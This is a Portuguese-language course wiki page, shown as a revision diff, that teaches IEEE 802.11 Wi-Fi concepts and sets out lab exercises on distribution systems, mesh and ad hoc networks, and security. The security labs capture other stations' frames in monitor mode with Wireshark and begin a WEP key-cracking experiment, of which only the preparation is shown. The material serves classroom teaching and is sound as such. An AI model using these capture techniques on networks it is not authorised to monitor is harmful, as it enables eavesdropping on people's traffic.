Mudanças entre as edições de "IER60808: Redes locais sem-fio"

De MediaWiki do Campus São José
Ir para navegação Ir para pesquisar
Linha 3: Linha 3:
  
 
O padrão IEEE 802.11 define uma tecnologia de redes locais sem-fio (WLAN), mais conhecida como WiFi. Esse tipo de rede tem como algumas características o baixo custo dos dispositivos, facilidade de utilização e boas taxas de transmissão em curtas distâncias (algumas dezenas de metros). Apesar de ter sido projetada para redes locais, essa tecnologia também tem sido usada para redes de média distância (alguns km). No entanto, para distâncias mais longas o padrão precisa ser adaptado para que funcione de forma eficiente. Para entender como criar enlaces de acesso sem-fio de alguns quilômetros usando esse tipo de tecnologia, é necessário entender seus princípios de funcionamento.
 
O padrão IEEE 802.11 define uma tecnologia de redes locais sem-fio (WLAN), mais conhecida como WiFi. Esse tipo de rede tem como algumas características o baixo custo dos dispositivos, facilidade de utilização e boas taxas de transmissão em curtas distâncias (algumas dezenas de metros). Apesar de ter sido projetada para redes locais, essa tecnologia também tem sido usada para redes de média distância (alguns km). No entanto, para distâncias mais longas o padrão precisa ser adaptado para que funcione de forma eficiente. Para entender como criar enlaces de acesso sem-fio de alguns quilômetros usando esse tipo de tecnologia, é necessário entender seus princípios de funcionamento.
 +
 +
<youtube>hePLDVbULZc</youtube>
 +
<br>''Uma visão geral do WiFi com animações !''
  
 
= Estrutura de uma rede IEEE 802.11 =
 
= Estrutura de uma rede IEEE 802.11 =
Linha 17: Linha 20:
  
 
[[imagem:Wlan2.png|800px]]
 
[[imagem:Wlan2.png|800px]]
 +
 +
== Canais e frequências ==
 +
 +
<youtube>https://www.youtube.com/watch?v=J_bf_KE5llQ</youtube>
 +
<br>''2.4 GHz vs 5 GHz''
  
  

Edição das 19h44min de 6 de agosto de 2020


O padrão IEEE 802.11 define uma tecnologia de redes locais sem-fio (WLAN), mais conhecida como WiFi. Esse tipo de rede tem como algumas características o baixo custo dos dispositivos, facilidade de utilização e boas taxas de transmissão em curtas distâncias (algumas dezenas de metros). Apesar de ter sido projetada para redes locais, essa tecnologia também tem sido usada para redes de média distância (alguns km). No entanto, para distâncias mais longas o padrão precisa ser adaptado para que funcione de forma eficiente. Para entender como criar enlaces de acesso sem-fio de alguns quilômetros usando esse tipo de tecnologia, é necessário entender seus princípios de funcionamento.


Uma visão geral do WiFi com animações !

Estrutura de uma rede IEEE 802.11

Uma rede local sem-fio (WLAN) IEEE 802.11 é implantada por um equipamento especial chamado de ponto de acesso (AP - Access Point). Esse equipamento estabelece uma WLAN, de forma que computadores, smartphones, PDAs, laptops, tablets (e outros dispositivos possíveis) possam se comunicar pelo canal sem-fio. Esses dispositivos são denominados estações sem-fio (WSTA - Wireless Station), e se comunicam usando o AP como intermediário. Isso significa que todas as transmissões na WLAN são intermediadas pelo AP: ou estão indo para o AP, ou vindo dele. Além disso, uma WSTA somente pode se comunicar na WLAN se primeiro se associar ao AP - isto é, se registrar no AP, sujeitando-se a um procedimento de autenticação.

Do ponto de vista da organização da WLAN, a menor estrutura possível é o BSS (Basic Service Set), mostrado na figura abaixo. Um BSS é formado por um AP e as WSTA a ele associadas. O BSS possui um nome, identificado pela sigla SSID (Service Set Identifier), que deve ser definido pelo gerente de rede. O BSS opera em um único canal, porém as transmissões podem ocorrer com diferentes taxas de bits (cada quadro pode ser transmitido com uma taxa, dependendo da qualidade do canal sem-fio conforme medida pela WSTA que faz a transmissão). Por fim, apenas uma transmissão pode ocorrer a cada vez, o que implica o uso de um protocolo de acesso ao meio (MAC) pelas WSTA e AP.


Wlan1.png


O AP opera em nível de enlace, de forma parecida com um switch ethernet (porém sua tarefa é um pouco mais complexa ...). Isso quer dizer que o AP não usa o protocolo IP para decidir como encaminhar os quadros das WSTA, e assim não faz roteamento. Uma consequência desse modo de operação do AP é que a junção de dois ou mais AP por meio de um switch ethernet, com seus respectivos BSS, faz com que WSTAs em diferentes BSS possa se comunicar como se fizessem parte da mesma rede local. A união de dois ou mais BSS, mostrada na figura a seguir, se chama ESS (Extended Service Set). Em um ESS, todos os BSS possuem o mesmo SSID. No entanto, ao se criar um ESS deve-se cuidar para evitar que BSS vizinhos usem o mesmo canal.

Wlan2.png

Canais e frequências


2.4 GHz vs 5 GHz


As redes IEEE 802.11b e IEEE 802.11g usam a frequência 2.4 GHz para seus canais, que são espaçados a cada 5 MHz. As redes IEEE 802.11n usam frequências de 2.4 ou 5 GHz. O pádrão mais recente, IEEE 802.11ac, usa exclusivamente 5 GHz. No caso de IEEE 802.11n, ainda a mais comum de ser usada, quando na banda de 2.4 GHz os canais são numerados de 1 a 11. Quando usa modo de modulação com largura de 20 MHz, apenas três dentre onze canais (no máximo) não apresentam sobreposição. Isso ocorre porque cada canal tem largura de 5 MHz. A tabela abaixo mostra os canais usados em IEEE 802.11n, indicando a lista de canais interferentes de cada canal.

Wlan-canais.png

Quando se usa modulação com largura de 40 MHz, apenas um canal pode ser usado (o canal 6), pois toda a banda disponível é usada.

No caso da banda de 5 GHz há muito mais canais, e as combinações de canais não-sobrepostos se torna mais complexa:

PJI3-Wifi-5ghz.jpg

Sistemas de Distribuição

Uma típica WLAN com estrutura distribuída pode ser criada explorando-se o conceito de Sistema de Distribuição (DS - Distribution System).

Em uma rede IEEE 802.11, vários BSS podem se combinar para formarem um ESS (Extended Station Set). A interligação entre os AP deve ser feita em nível de enlace, seja por uma rede cabeada ou por links sem-fio. Essa interligação é denominada Sistema de Distribuição, estando exemplificada na figura abaixo:


80211-ds.png


O sistema de distribuição funciona como uma ponte entre as WSTA, como mostrado na figura abaixo. Assim, se dois AP forem interligados, as WSTA que pertencem a seus BSS poderão se comunicar como se estivessem na mesma rede local.


80211-ds2.png


Sistemas de distribuição podem ser implantados usando o próprio canal sem-fio, sendo assim denominados WDS (Wireless Distribution System).

Pji3-80211-wds.png


A cobertura de uma área envolve um planejamento que leve em conta as taxas mínimas desejáveis e as características dos equipamentos (potências de transmissão e ganhos de antenas) e do ambiente (existência de obstáculos, reflexões, e fontes de ruído). Além disso, deve-se minimzar a interferência entre BSS vizinhos, o que pode ser feito escolhendo-se canais que não se sobreponham. A figura abaixo mostra conceitualmente como se podem escolher os canais dos AP para atingir esse objetivo (no caso, para banda de 2.4 GHz e canais de 20 MHz).

80211-freq-planning.png


Desta forma, podem-se criar BSS para cobrir uma área e aproveitar melhor a capacidade do meio de transmissão.

80211-cobertura.png

Deve-se levar em conta que a qualidade do sinal tem relação com a modulação usada (e da taxa de dados), assim o limiar entre um BSS e outro depende de como as estações medem a qualidade de sinal e quais as taxas mínimas aceitáveis. A figura abaixo ilustra possíveis alcances para diferentes taxas de dados.

80211-ranges-rates.png
Taxas em função da distância do AP (exemplo, pois depende das condições do ambiente e dos equipamentos)

Considerações sobre implantação de redes locais sem-fio

Vimos que, para ampliar a cobertura de uma rede sem-fio IEEE 802.11, usam-se vários AP interligados em um Sistema de Distribuição (DS). Uma das maiores dificuldades ao se implantar uma rede sem-fio é determinar:

  • quantos AP são necessários
  • onde devem ser instalados
  • qual o canal e potência de transmissão a serem usados em cada AP.

Existem algumas técnicas para estimar a cobertura de cada AP, dados sua potência de transmissão e as características do ambiente em que se encontra (paredes, portas, outros obstáculos). Um bom resumo pode ser encontrado no TCC "Estudo e projeto para o provimento seguro de uma infra-estrutura de rede sem fio 802.11" de Cesar Henrique Prescher, defendido em 2009. Mas mesmo que se apliquem as recomendações ali descritas, ao final será necessário fazer uma verificação em campo da rede implantada. Para isso deve-se medir a qualidade de sinal sistematicamente na área de cobertura, para identificar regiões de sombra (sem cobertura ou com cobertura deficiente) e de sobreposição de sinais de APs. Tal tarefa implica o uso de ferramentas apropriadas e da aplicação de medições metódicas.

O MAC CSMA/CA

O protocolo MAC usado em redes IEEE 802.11 se chama CSMA/CA (Carrier Sense Multiple Access/Collision Avoidance). Ele foi desenhado para prover um acesso justo e equitativo entre as WSTA, de forma que em média todas tenhas as mesmas oportunidades de acesso ao meio (entenda isso por "oportunidades de transmitirem seus quadros"). Além disso, em seu projeto foram incluídos cuidados para quue colisões sejam difíceis de ocorrer, mas isso não impede que elas aconteçam. Os procedimentos e cuidados do MAC para evitar e tratar colisões apresentam um certo custo (overhead), que impedem que as WSTA aproveitem plenamente a capacidade do canal sem-fio. Consequentemente, a vazão pela rede sem-fio que pode de fato ser obtida é menor que a taxa de bits nominal (por exemplo, com IEEE 802.11g e taxa de 54 Mbps, efetivamente pode se obter no máximo em torno de 29 MBps).

O protocolo CSMA/CA implementa um acesso ao meio visando reduzir a chance de colisões. Numa rede sem-fio como essa, não é possível detectar colisões, portanto uma vez iniciada uma transmissão não pode ser interrompida. A detecção de colisões, e de outros erros que impeçam um quadro de ser recebido pelo destinatário, se faz indiretamente com quadros de reconhecimento (ACK). Cada quadro transmitido deve ser reconhecido pelo destinatário, como mostrado abaixo, para que a transmissão seja considerada com sucesso.

Wlan-ack.png
Envio de um quadro de dados, com subsequente reconhecimento (ACK)


O não recebimento de um ACK desencadeia uma retransmissão, de forma parecida com o procedimento de retransmissão do CSMA/CD ao detectar colisão. Antes de efetuar uma retransmissão, o MAC espera um tempo aleatório denominado backoff (recuo). Esse tempo é sorteado dentre um conjunto de possíveis valores que compõem a Janela de Contenção (Cw - Contention Window), representados no intervalo [0, Cw]. O valor de Cw varia de (15 para IEEE 802.11a/g/n e 31 para 802.11b) a (1023), e praticamente dobra a cada retransmissão de um mesmo quadro. A figura abaixo ilustra as janelas de contenção para retransmissões sucessivas.

Wlan-backoff.png
Backoff para retransmissões sucessivas


Resumidamente, o protocolo MAC usa basicamente dois mecanismos principais para fazer o acesso ao meio:

  • Antes de uma transmissão, verifica-se se o canal está livre. Caso não esteja, deve-se primeiro aguardar que fique livre.
  • Cada quadro transmitido deve ser confirmado pelo receptor. Isso quer dizer que o receptor deve enviar um quadro de confirmação para o transmissor (ACK). Se esse quadro ACK não for recebido, o transmissor assume que houve um erro. Nesse caso, o transmissor faz uma retransmissão.
  • Antes de uma retransmissão o transmissor se impõem um tempo de espera aleatório chamado de backoff. A duração máxima do backoff depende de quantas retransmissões do mesmo quadro já foram feitas.


A figura abaixo ilustra um cenário em que cinco WSTA disputam o acesso ao meio. Repare os backoff feitos pelas WSTA antes de iniciarem suas transmissões. Esse backoff sempre precede uma transmissão quando a WSTA for verificar o canal sem-fio e o encontra ocupado (pense em por que o MAC deve fazer isso ...).

Wlan-csmaca.png


Por fim, o MAC CSMA/CA usado nas redes IEEE 802.11 define uma formato de quadros, mostrado na figura abaixo. Note que ele é diferente do quadro ethernet, e portanto o AP precisa traduzir os cabeçalhos de quadros que viajam da rede cabeada para a WLAN, e vice-versa. Note também que os endereços MAC do CSMA/CA são os mesmos que em redes ethernet.


Wlan-frame.png

Segurança em redes sem-fio IEEE 802.11

Wifi security.jpg


Redes sem-fio oferecem muitos atrativos, como acesso ubíquo, ausência de cabeamento e suporte a usuários móveis. Mas também se sujeitam a uso indevido, uma vez que pessoas não-autorizadas no alcance do sinal do ponto de acesso podem tentar usá-la para se comunicarem. Em geral três questões fundamentais aparecem no que diz respeito à segurança em redes sem-fio:

  1. Acesso indevido: uso indevido da infraestrutura por pessoas não-autorizadas.
  2. Monitoramento do tráfego da rede: os quadros na rede sem-fio podem ser coletados e interpretados, com possível roubo ou revelação de informação sensível.
  3. Infiltração de equipamentos na rede: um ou mais pontos de acesso podem ser infiltrados na rede sem-fio, fazendo com que pessoas os utilizem para se comunicarem. Assim, o tráfego dessas pessoas pode passar por outra rede, sendo passível de monitoramento.

Por exemplo, redes em locais densamente ocupados (como edifícios) podem ser investigadas por alguém em busca de uma rede aberta ou fácil de ser invadida. Essa pessoa pode simplesmente querer usar o acesso à Internet disponível em alguma rede sem-fio, ou mesmo invadir os equipamentos existentes em tal rede. A figura abaixo mostra uma situação hipotética em que uma pessoa investiga a existência de redes sem-fio a partir de um carro que trafega pelas ruas.

View from Wardriver Windshield.jpg

Assim, uma rede sem-fio minimamente bem configurado deve usar mecanismos de segurança que impeçam ou dificultem seu uso indevido. Em um cenário usual, tal rede sem-fio poderia se apresentar como mostrado abaixo:

Wifi-security1.png


Para tratar essas questões, deve haver mecanismos de segurança que contemplem os seguintes requisitos:

  1. Autenticação de usuários: usuários da rede sem-fio devem se identificar (ou autenticar) na infra-estrutura dessa rede, de forma a se autorizarem ou não seus acessos.
  2. Sigilo das comunicações: o tráfego na rede sem-fio deve ser encriptado, para que não seja inteligível caso sejam capturados por usuários mal-intencionados que estejam monitorando a rede sem-fio.
  3. Autenticação dos pontos de acesso: pontos de acesso devem se identificar para os usuários, para evitar a infiltração de pontos de acesso indevidos na rede.

Há mecanismos de segurança usados em redes IEEE 802.11 que contemplam todos os requisitos acima (WPA-EAP, WPA Enterprise), ou parcialmente (WPA-PSK ou WPA Personal). WPA-EAP aproveita a infraestrutura IEEE 802.1x, junto com técnicas de encriptação entre estações sem-fio, para atender esses requisitos. Já WPA-PSK usa apenas as técnicas de encriptação, não havendo um controle de acesso baseado em usuário. Na figura abaixo se mostra uma pequena rede sem-fio que usa WPA-EAP.

Wifi-auth.jpeg

Além dos mecanismos WPA, definidos na norma IEEE 802.11i, outra forma de implantar controle de acesso em redes sem-fio se vale de um portal de captura. Quando um usuário não identificado acessa a rede, o acesso ao ponto de acesso é concedido mas ao tentar navegar na Web seu acesso é desviado para uma página predefinida. Nessa página o usuário deve se identificar (ex: com login e senha), e em caso de sucesso seu acesso à Internet é liberado. Essa técnica se vale de uma combinação de mecanismos (firewall com filtro IP, serviço Web, uso de programas para autenticação) para controlar o acesso dos usuários. No entanto, não provê sigilo das comunicações nem autenticação de pontos de acesso ao usuário. Sua atratividade reside na simplicidade de implantação e uso (não necessita de supplicant), sendo uma escolha comum em hot spots como aeroportos e cyber cafes.

Redes Ad Hoc

As redes Ad Hoc não dependem a rigor de existir uma infraestrutura prestabelecida para que as estações possam se comunicar. Nessas formas de organização de redes sem-fio, as estações podem transmitir quadros diretamente entre si, e mesmo entre estações fora do alcance direto. Nesse caso, a transmissão de quadros ocorre em múltiplos saltos (multihop), e depende de mecanismos para descobrir caminhos dentro da rede sem-fio.


Características:

  • Ausência de uma estação base (ou Access Point).
  • Cada estação pode se comunicar diretamente com qualquer outra estação em seu alcance.
  • Problemas dos nodos escondidos e expostos se manifestam intensamente.
  • Demandam roteamento especializado para a descoberta de caminhos, quando necessário fazer encaminhamento em múltiplos saltos.
    • Descoberta de caminhos: no caso de redes IEEE 802.11, depende de uso de tecnologia adicional e fora do escopo da rede sem-fio. Por exemplo, se as estações se comunicarem com IPv4 ou IPv6, podem-se usar protocolos de roteamento IP (ex: AODV, OLSR). Isso demanda a configuração adicional desses protocolos, e não garante uma integração plena com a rede sem-fio - quer dizer, esses protocolos de roteamento podem não conseguir escolher os melhores caminhos, pois podem não ter acesso a todas as informações sobre as qualidades de links entre as estações.

Adhoc1.jpg
Podem possibilitar a criação de uma rede local temporária em um ambiente previamente sem infraestrutura (AP)


Adhocnet.gif
Podem formar redes temporárias entre equipamentos móveis


Vanet.gif
Podem ser usadas como base para aplicações inovadoras, como redes veiculares

Redes Mesh

Assim como as redes Ad Hoc, redes mesh não dependem a rigor de existir uma infraestrutura prestabelecida para que as estações possam se comunicar. A principal diferença entre redes ad hoc e mesh reside justamente em como se faz a descoberta de caminhos. Na verdade, redes mesh podem ser considerados um caso especial de redes ad hoc.

De forma geral, redes mesh são compostas por um conjunto de nodos capazes de descobrir caminhos dentro da rede, os quais são usados pelos demais nodos da rede para que possam se comunicar. Assim, os nodos roteadores formam uma malha cujos caminhos idealmente são compostos pelos enlaces de melhor qualidade. Apesar de não existirem estações base (i.e. pontos de acesso), essa rede provê uma certa infraestrutura para que nodos acessem a rede e se comuniquem. Além disso, assume-se que os nodos roteadores sejam estáticos ou possuam baixo grau de mobilidade, de forma que seus enlaces sejam duradouros. Essa forma de organização se apresenta em diferentes redes sem-fio, tais como redes metropolitanas e redes industriais. Existe uma extensão ao padrão IEEE 802.11 proposta para possibilitar a formação de redes mesh com esse tipo de rede sem-fio.

O padrão IEEE 802.11s (atualmente incorporado ao padrão IEEE 802.11) propõe mecanismos para o estabelecimento de redes mesh. No escopo de redes IEEE 802.11, estações capazes de formarem redes mesh (chamadas de mesh points) descobrem automaticamente suas estações vizinhas e as utilizam para estabelecerem caminhos para outras estações que estejam fora de alcance direto. Para isso, dois componentes importantes da tecnologia foram definidos:

  • Um estimador de qualidade de enlace para avaliar os enlaces entre estações, e assim poder estabelecer e usar os melhores caminhos dentro da rede.
  • Um ou mais protocolos de descoberta de caminhos (evita-se o termo roteamento, por estar associado uma função da camada de rede), sendo mandatório o HWMP (Hybrid Wireless Mesh Protocol). Há também o OLSR (Optimized Link State Routing Protocol), que é opcional.

O kernel Linux possui uma implementação do IEEE 802.11s feita em software, explorando a capacidade de muitas interfaces de rede de delegarem as funções de gerenciamento do MAC para o device driver (isso é conhecido como SoftMAC). Assim, pode-se estabelecer e experimentar uma rede mesh IEEE 802.11s usando-se algumas ferramentas do Linux.



Componentes de uma rede mesh IEEE 802.11

Uma rede mesh IEEE 802.11 funciona como um único domínio de broadcast. Assim, do ponto de vista das estações é como se todas fizessem parte da mesma LAN. O conjunto de estações de uma rede mesh é denominado MBSS (Mesh BSS), sendo identificado por um nome - da mesma forma que uma rede infraestruturada possui seu SSID.

Redes mesh IEEE 802.11 são compostas por três tipos de estações:

  • MP (Mesh Point): estação capaz de se comunicar pela rede mesh e agir como intermediária para encaminhar quadros, pois participa da descoberta de caminhos com o protocolo HWMP.
  • MAP (Mesh AP): estação mesh que tem também papel de AP. Usada para possibilitar que estações convencionais (que não são MP) se comuniqquem pela rede mesh.
  • MPP (Mesh Portal): estação que interliga a rede mesh com a rede cabeada.

A figura abaixo ilustra os três tipos de estações em uma rede mesh:

Mesh-80211.png


Atividade

Para estes experimentos serão usados três pontos de acesso TP-Link TL-WDR4300 ou TP-Link Archer AC1750

Parte 1: Um ESS com sistema de distribuição cabeado

80211-ds.png
Um sistema de distribuição usando uma LAN cabeada

  1. Configure o rádio 2.4GHz de cada um dos AP com:
    • Mesmo SSID (nome de rede)
    • Cada um deve usar um canal diferente (largura de canal pode ser a mesma)
    • Mesmo modo de operação (ex: 802.11n)
    • Mesmo tipo de encriptação e senha
    • Baixa potência de transmissão
  2. Configure a interface LAN desses AP de forma que se possa acessar suas interfaces de gerenciamento. Portanto, cada interface deve ter um endereço IP único na subrede do laboratório (192.168.1.0/24)
  3. Acessem a rede sem-fio implantada usando seus celulares. Identifiquem com qual dos APs cada celular se associou.
  4. Usem o app Wifi Analyzer para mostrar que redes sem-fio estão disponíveis. Identifiquem a rede implantada, e os canais em que está disponível.

Parte 2: análise das comunicações

As comunicações numa rede IEEE 802.11 podem ser analisadas usando ferramentas especiais. A interface de rede deve operar em modo monitor, em que cópias de todos os quadros recebidos e enviados são entregues a um programa analisador. Com isso, podem-se visualizar todos os quadros transmitidos nesse tipo de rede.

  1. Cada computador do laboratório possui uma interface de rede sem-fio. Ative o modo monitor nessa interface com os seguintes comandos:
    sudo iw dev wlan0 interface add mon0 type monitor
    sudo ifconfig mon0 up
    sudo ifconfig wlan0 up
    
  2. Em um terminal, execute o wireshark:
    sudo wireshark
    
  3. No wireshark, ative a captura na interface mon0.
  4. Observe os quadros capturados. Identifique os tipos de quadros transmitidos na rede, analisando seus cabeçalhos (veja este capítulo de livro).
  5. Procure quadros do tipo beacon. Esses quadros são enviados pelos pontos de acesso (AP), e anunciam a existência de uma rede sem-fio com um certo identificador.
    • Identifique os quadros beacon da rede sem-fio da nossa experiência.
    • Observe as características da rede sem-fio que estamos usando
  6. Obtenha o programa wl-stats.
    • Mude sua permissão para que possa ser executado como programa:
      chmod +x wl-stats
      
    • Execute-o durante um minunto, e depois termine-o teclando CTRL C
    • Leia o sumário apresentado pelo programa. Veja quantos quadros são transmitidos, e quanto tempo a rede é de fato utilizada.
  7. O professor irá configurar dois computadores no laboratório para usar a rede sem-fio implantada, tendo o cuidado de fazer com que cada um se associe a um diferente AP.
    • Um dos computadores deve gerar tráfego em broadcast
    • No outro computador deve-se monitorar a comunicação com wireshark. É possível visualizar os quadros em broadcast enviados pelo primeiro computador ? Isso evidencia que as redes sem-fio dos diferentes AP estão integradas em uma única LAN.

Parte 3: Um ESS com sistema de distribuição sem-fio (WDS)

Pji3-80211-wds.png
Um ESS com um sistema de distribuição sem-fio (WDS)

  1. Modifique a configuração dos AP para que formem um WDS conforme a figura acima.
    • Todos AP devem usar o mesmo canal e mesma largura de banda
    • Habilite a opção WDS Bridging, e configure as informações ali solicitadas
  2. ATENÇÃO: os AP NÃO podem estar conectados na LAN do laboratório quando em modo WDS. Somente o AP que dá acesso aos demais AP (o AP à esquerda na figura) que deve estar ligado a LAN.
  3. Após salvar e ativar as novas configurações, acessem a rede sem-fio com seus celulares
  4. Identifiquem os APs com que seus celulares se associaram
  5. Testem a comunicação nessa rede sem-fio. Há alguma diferença perceptível em relação ao DS pela rede cabeada ?
  6. Os professores novamente irão configurar dois computadores no laboratório para usar a rede sem-fio implantada, tendo o cuidado de fazer com que cada um se associe a um diferente AP.
    • Um dos computadores deve gerar tráfego em broadcast
    • No outro computador deve-se monitorar a comunicação com wireshark. É possível visualizar os quadros em broadcast enviados pelo primeiro computador ? Isso evidencia que as redes sem-fio dos diferentes AP estão integradas em uma única LAN.
  7. Um teste de desempenho deve ser realizado nos computadores:
    • Em cada um dos computadores deve-se fazer ping para o gateway do laboratório (192.168.1.1). Há diferença perceptível no tempo de resposta ?
    • Em cada um dos computadores deve-se realizar a transferência deste arquivo. Houve diferença nas taxas de transferência obtidas ?
  8. Modifique a configuração dos AP da seguinte forma:
    • O WDS deve ser realizado usando o rádio 5 GHz
    • O rádio 2.4GHz deve ser usado para dar acesso aos clientes, e cada AP deve usar um canal diferente
  9. Repita os testes de desempenho ... houve alguma diferença ?

Parte 4: mobilidade na rede sem-fio

  1. Acessem algum site de streaming (ex: Youtube ou Netflix), e inicie a reprodução de um video longo.
  2. Para simular a transição de BSS (mudança de AP), os AP serão desligados alternadamente.
    • Observe o que acontece com a reprodução dos videos enquanto isso. Ela continua como se nada tivesse acontecido ? Ou ela continua com algumas interrupções ? Ou ela interrompe definitivamente ?
    • Verifique se seu celular mudou de AP de forma transparente (sem precisar de sua intervenção)

Parte 5: A rede Wifi mais veloz ...

Nesta atividade, algumas redes sem-fio serão implantadas no laboratório, e testes de desempenho serão realizados para cada uma delas. O objetivo é conseguir a rede wifi mais veloz possível. Dois critérios serão usados:

  1. Vazão (throughput): a vazão é a maior taxa de bits sustentável que se pode obter
  2. Latência: no contexto da rede wifi, latência é o atraso (ou demora) para receber uma resposta a uma requisição (ex: ping)


  • Serão implantadas 6 redes sem-fio
  • Cada rede deve ter um SSID diferente
  • Os pontos de acesso são idênticos
  • Cada equipe deve configurar seu ponto de acesos de forma a proporcionar a maior vazão e a menor latência.
    • A vazão deve ser medida usando o programa iperf, usando o computador do professor para a medição
    • A latência deve ser medida usando ping para o computador do professor


Explorem os parâmetros de configuração da rede sem-fio, para obter a melhor rede possível !

Parte 6: Análise de cobertura de uma rede wifi

A análise de cobertura de uma rede wifi, chamada de site survey, visa mapear a qualidade de sinal em uma determinada área. Com isso identificam-se os locais ou setores em que não há cobertura de sinal wifi, ou verificam-se os locais em que a qualidade do sinal é deficiente. Esse tipo de análise é realizada para dar subsídios a projetos de melhoria na implantação de redes sem-fio. Com base em seus resultados, podem-se propor melhores localizações para implantação de pontos de acesso, e também sugerir a implantação de pontos de acesso adicionais.

Para efetuar uma análise de cobertura, são necessários:

  1. um equipamento capaz de medir, em diferentes canais, a intensidade de sinais emitidos por pontos de acesso sem-fio
  2. um dispositivo para associar essas medições a localizações geográficas
  3. um mapa da região sujeita à análise
  4. um software que apresente as medições em um formato claro (ex: mapa de calor)


Ier-Heatmap-wifi.png
Exemplo de um mapa de calor


Atualmente, celulares atendem os requisitos 1 e 2, pois possuem interfaces wifi e GPS. Para o requisito 4, existem softwares específicos para celulares capazes de realizar o mapeamento (ex: Wi-Fi Visualizer, WiFi Site Survey).


A tarefa proposta é realizar a análise de cobertura da rede sem-fio do IFSC no câmpus São José. Essa análise deve se concentrar nas áreas usadas pelos alunos: salas de aula, laboratórios, corredores e áreas de convivência.

Parte 7: Uma rede wifi ad hoc

Estações podem se comunicar sem a intermediação de um AP. Neste caso, tem-se uma rede sem-fio ad hoc. Isto pode ser útil para criar enlaces temporários entre computadores em ambientes desprovidos de AP. Outra utilidade é a criação de enlaces sem-fio ponto-a-ponto com antenas direcionais. Para criar uma rede ad hoc deve-se fazer o seguinte

  1. Crie uma nova rede wifi no applet do NetworkManager (ícone no canto superior direito da tela)
  2. A nova rede deve ter SSID IER, e operar no modo Ad Hoc na banda de 2.4 GHz e canal 11
  3. Configure o endereço IP da nova rede como sendo 10.0.0.X/24 (X deve ser um número entre 2 e 254)
  4. Faça testes de comunicação com as demais estações sem-fio, usando o iperf:
    iperf -c IP_de_outra_WSTA -i 5 -t 60
    
    .. e em oujtra estação sem-fio:
    iperf -s
    
  5. Após os testes de transmissão com iperf, verifique os contadores de erros de transmissão da interface sem-fio. Em particular, observe TX excessive retries (iwconfig), e errors e collisions (ifconfig).
  6. Identifique todas as demais estações com que consegue se comunicar (use ping). Existe alguma delas que esteja fora de alcance ?


Parte 8: Uma rede wifi mesh

  1. Agora vamos implantar uma rede mesh. Para isso, seu computador será configurado como um MP com os seguintes comandos:
    sudo iw dev wlan0 interface add mesh0 type mesh mesh_id "IER"
    sudo ifconfig mesh0 10.0.1.X/24
    
    ... sendo que X deve estar entre 2 e 254.
  2. Identifique todas as demais estações com que consegue se comunicar (use ping). Existe alguma nova estação, comparado ao caso da rede ad hoc ?
  3. Nesse tipo de rede mesh cada estação consegue descobrir caminhos na rede para se comunicar com outras estações. Veja os caminhos conhecidos por sua estação, usando este comando:
    sudo iw dev mesh0 mpath dump
    
    Observe as informações associadas a cada caminho: custo do caminho (métrica) e estação intermediária.
  4. Faça testes de comunicação com as demais estações sem-fio, usando o iperf:
    iperf -c IP_de_outra_WSTA -i 5 -t 60
    
    ... e, em outra WSTA:
    iperf -s
    
  5. Após os testes de transmissão com iperf, verifique os contadores de erros de transmissão da interface sem-fio. Em particular, observe TX excessive retries (iwconfig), e errors e collisions (ifconfig).
  6. Identifique os caminhos gerados na rede mesh:
    sudo iw dev mesh0 mpath dump
    
  7. ... como isso poderia ser usado no roteador sem-fio a ser desenvolvido pela turma ???

Parte 9: Segurança em redes Wifi

Os AP evem ser instalados com endereços IP 192.168.1.250 e 192.168.1.251 (usados para acesso a suas interfaces de gerenciamento). Eles são capazes de trabalharem com WEP, WPA-PSK e WPA-EAP. A interface web de cada AP mostra as opções de configuração de segurança, como será mostrado pelo professor.

Experimento 1: rede com modo de segurança desativado

  1. Para fins de comparação, o AP será configurado inicialmente com modo de segurança desativado. Usando o Network Manager conecte seu computador à rede sem-fio IER, e em seguida desative a interface de rede cabeada com o comando:
    sudo ifconfig eth0 down
    
    • Execute ping 191.36.13.62, e deixe-o rodando.
    • Monitore o tráfego pela interface de rede sem-fio, usando o wireshark (sudo wireshark). O que você consegue visualizar do tráfego que circula na rede ? É possível ver o tráfego de outros computadores ?
    • Na verdade, a interface de rede não mostra os quadros de outras estações. Mas se for criada uma interface de rede do tipo monitor, todo o tráfego da rede sem-fio que chegar até sua interface de rede pode ser capturado. Para criar esse tipo de interface faça o seguinte (substitua wlan0 pelo nome da sua interface):
      sudo iw dev wlan0 interface add mon0 type monitor
      sudo ifconfig mon0 up
      
      ... e em seguida no wireshark faça a captura de pacotes nessa interface. Use o filtro de captura wlan type data para selecionar somente quadros de dados. Observe os quadros capturados, e veja se é possível ver seu conteúdo (se é inteligível). O que se pode concluir sobre os quadros de dados na rede sem-fio, se não há um mecanismo de segurança ativado ?

Experimento 2: rede com modo de segurança WEP

  1. Após esse teste, o AP estará configurado para proporcionar o modo de segurança com WEP, usando a chave mreth. Assim, as interfaces de rede sem-fio devem ser configuradas para usarem essa chave, o que deve ser feito diretamente na applet do NetworkManager (ver canto direito do menu superior da área de trabalho). Após fornecer o valor da chave, abra um terminal e monitore o status da interface usando o comando:
    sudo iwconfig wlan0
    
    Rapidamente deve aparecer a informação de que ela está associada ao AP, o que indica que a chave WEP estava correta. O iwconfig deve mostrar um resultado semelhante a este:
    $ sudo iwconfig wlan0
    wlan0 IEEE 802.11g ESSID:"IER" Nickname:""
      Mode:Managed Frequency:2.437 GHz Access Point: 00:1B:11:1C:E3:7D
      Bit Rate:36 Mb/s Tx-Power:16 dBm Sensitivity=1/1
      Retry:off RTS thr:off Fragment thr:off
      Encryption key: 6D72-6574-68
      Power Management:off
      Link Quality=59/70 Signal level=-37 dBm Noise level=-96 dBm
      Rx invalid nwid:3064 Rx invalid crypt:0 Rx invalid frag:0
      Tx excessive retries:0 Invalid misc:0 Missed beacon:0
    
    OBS: a interface de rede sem-fio pode aparecer com um nome diferente no seu computador. Ex: wlan1, wlan2, ...
  2. A interface de rede sem-fio deve ter conseguido obter um endereço IP, porque no laboratório o AP possui um servidor DHCP). Isto pode ser verificado com o comando ifconfig wlan0. Teste a comunicação pela rede sem-fio, fazendo um ping para o computador 192.168.1.1.
  3. Usando o wireshark faça a captura de pacotes na interface mon0. Use este filtro de captura: wlan type data. Observe os quadros capturados, e veja se é possível ver seu conteúdo (se é inteligível). O que se pode concluir sobre os quadros de dados com WEP na rede sem-fio ?

Experimento 3: Quebrando a chave WEB de uma rede wifi

Este experimento demanda o uso de uma máquina virtual, pois é necessário executar comandos como superusuário.


Preparação

  1. Desabilite a rede wifi na applet do NetworkManager (canto superior direito da tela)
  2. Inicie o Virtualbox, selecionando a máquina virtual 3-Gráfico
  3. Conecte uma interface USB a seu computador
